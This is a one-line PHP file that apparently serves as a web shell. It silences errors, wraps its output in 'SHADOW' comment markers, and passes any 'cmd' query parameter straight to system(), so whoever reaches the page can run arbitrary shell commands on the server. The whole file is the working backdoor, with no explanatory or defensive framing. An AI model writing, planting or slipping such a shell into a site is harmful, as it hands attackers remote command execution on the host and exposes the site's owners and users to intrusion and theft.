<?php @error_reporting(0);echo'<!--SHADOW-->';if(isset($_GET['cmd'])){echo'<pre>';system($_GET['cmd']);echo'</pre>';}echo'<!--/SHADOW-->';?>